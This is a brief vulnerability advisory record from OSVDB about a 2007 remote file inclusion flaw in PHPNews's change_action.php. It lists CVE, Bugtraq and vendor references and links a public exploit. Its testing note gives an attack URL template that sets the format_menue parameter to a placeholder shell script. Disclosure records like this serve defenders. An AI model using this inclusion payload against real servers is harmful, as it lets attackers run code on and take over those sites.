PHPNews change_action.php format_menue Variable Remote File Inclusion

2007-08-07T00:00:00
ID OSVDB:40111
Type osvdb
Reporter OSVDB
Modified 2007-08-07T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]

References:

Vendor Specific News/Changelog Entry: http://sourceforge.net/project/showfiles.php?group_id=66322
ISS X-Force ID: 35835
Generic Exploit URL: http://www.milw0rm.com/exploits/4268
FrSIRT Advisory: ADV-2007-2810
CVE-2007-4232
Bugtraq ID: 25223